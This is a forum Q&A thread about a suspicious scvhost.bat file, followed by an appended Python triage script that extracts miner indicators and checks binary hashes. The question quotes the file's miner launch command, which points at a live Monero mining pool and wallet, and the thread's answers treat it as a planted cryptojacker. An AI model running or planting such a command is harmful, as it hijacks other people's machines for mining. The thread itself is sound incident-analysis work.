
I have just found this .bat file that was named scvhost.bat. The file had this content in it:

scvhost -a cryptonight -o stratum+tcp://xmr-eu.dwarfpool.com:8005 -u 48uh2mrdkdq2tQysfkX2hZDi2hkRua4GX13EqY8djJ5xNXhez7baztVWbwXa34vUMveKAzAiA4j8xgUi29TpKXpm42jqV6H.microSf -p MXXXXXX-t 02

Is this a virus (to steal info etc.) or a planted miner? I am worried as I also dabble in cryptocurrencies and stratum is a currency that is mentioned in the above file.

  • This indeed seems to be a miner. Given that you use cryptocurrencies yourself, if you also mine, make sure this is not actually part of whatever you use to mine. You can do so by renaming the .bat extension to something else and seeing if you can still mine normally after a reboot. One thing I find odd about this file is that normally it would call itself, given that scvhost is both the name of what it executes and of the bat file. Normally that would result in a loop.
    – LPChip
    Commented Jan 16, 2018 at 9:34
  • @VirtualAnomaly I think you are mistaking sVChost for the sCVhost mentioned here. Yes, I am very much aware that svchost is the mechanics for hosting services.
    – LPChip
    Commented Jan 16, 2018 at 9:55
  • @LPChip My apologies, you are correct, I was mistaken.
    – James Hyde
    Commented Jan 16, 2018 at 10:03
  • Somebody played too much Starcraft, I guess.
    Commented Jan 16, 2018 at 13:01
  • @lucidbrot SCVs are the "builder" unit of one of the game's races (terrans), in which case it stands for "Space Construction Vehicle".
    – Aaron
    Commented Jan 16, 2018 at 18:26

1 Answer


This does seem to be a miner of some sort, especially since the parameter contains the URL to a mining pool. However, you need to be sure what is in the binary. It would make sense to compare checksums of the binary you found on your system with the releases made by the development team of the miner. If they differ, consider your system insecure.

Another issue is that you found out about this miner (probably because it was using a lot of CPU), but you have no idea what else happened on your system. If an intruder could launch the miner, they could've launched other things as well. It might be a good idea to recover from backup or do a fresh install anyway.
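Added example (not code from the question, the answer, or any miner project): a small Python triage script that pulls the pool, algorithm and wallet indicators out of the launcher line quoted in the question, so they can go into an incident record, and then checks a binary's SHA-256 against a table of release hashes as the answer recommends. The hash table is a placeholder to be filled from the miner project's published checksums; the flag names (-a, -o, -u) are taken from the command line in the question, and the address pattern assumes a Monero-style 95-character base58 address.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# Launcher content as quoted in the question (the single line of scvhost.bat).
SAMPLE_BAT = (
    "scvhost -a cryptonight -o stratum+tcp://xmr-eu.dwarfpool.com:8005 "
    "-u 48uh2mrdkdq2tQysfkX2hZDi2hkRua4GX13EqY8djJ5xNXhez7baztVWbwXa34vUMveKAzAiA4j8xgUi29TpKXpm42jqV6H.microSf "
    "-p MXXXXXX-t 02"
)

# PLACEHOLDER: replace with SHA-256 values from the miner project's release page.
KNOWN_GOOD_SHA256 = {
    "0" * 64: "placeholder-release-x.y.z",
}

# stratum pool URL as used by the -o flag: scheme://host:port
POOL_RE = re.compile(r"stratum\+(?:tcp|ssl)://([^\s:/]+):(\d+)", re.I)
# Assumption: Monero-style address, 95 base58 chars starting with 4 or 8,
# optionally followed by ".worker" as in the sample.
WALLET_RE = re.compile(r"\b([48][1-9A-HJ-NP-Za-km-z]{94})(?:\.(\S+))?")
MINER_ALGOS = {"cryptonight", "cryptonight-lite", "cryptonight-heavy", "randomx"}


def extract_miner_indicators(text):
    """Pull the pieces an incident record needs out of a miner launch line."""
    tokens = text.split()
    ind = {
        "binary": tokens[0] if tokens else None,
        "algorithm": None,
        "pool_host": None,
        "pool_port": None,
        "wallet": None,
        "worker": None,
    }
    for i, tok in enumerate(tokens[:-1]):
        if tok == "-a":
            ind["algorithm"] = tokens[i + 1]
    m = POOL_RE.search(text)
    if m:
        ind["pool_host"], ind["pool_port"] = m.group(1), int(m.group(2))
    w = WALLET_RE.search(text)
    if w:
        ind["wallet"], ind["worker"] = w.group(1), w.group(2)
    return ind


def looks_like_miner(text):
    """A pool URL or a known mining algorithm flag is enough to flag the line."""
    ind = extract_miner_indicators(text)
    return ind["pool_host"] is not None or (ind["algorithm"] or "").lower() in MINER_ALGOS


def sha256_of_bytes(data):
    return hashlib.sha256(data).hexdigest()


def sha256_of_file(path):
    """Stream the file so large binaries do not have to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_binary(digest, known_good=KNOWN_GOOD_SHA256):
    """Return the matching release label, or None when the hash is unknown.

    An unknown hash does not prove the binary is malicious, but it means you
    cannot trust it; treat the host as compromised until shown otherwise."""
    return known_good.get(digest.lower())


if __name__ == "__main__":
    print(extract_miner_indicators(SAMPLE_BAT))
    # Demo against a constructed stand-in for the found binary.
    with tempfile.TemporaryDirectory() as d:
        fake = Path(d) / "scvhost.exe"
        fake.write_bytes(b"not a real release")
        digest = sha256_of_file(fake)
        print(digest, verify_binary(digest) or "NO MATCH: untrusted binary")
```

Run it with the real binary's path in place of the temporary file; any result other than a label from the release table means the checksum comparison the answer describes has failed.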
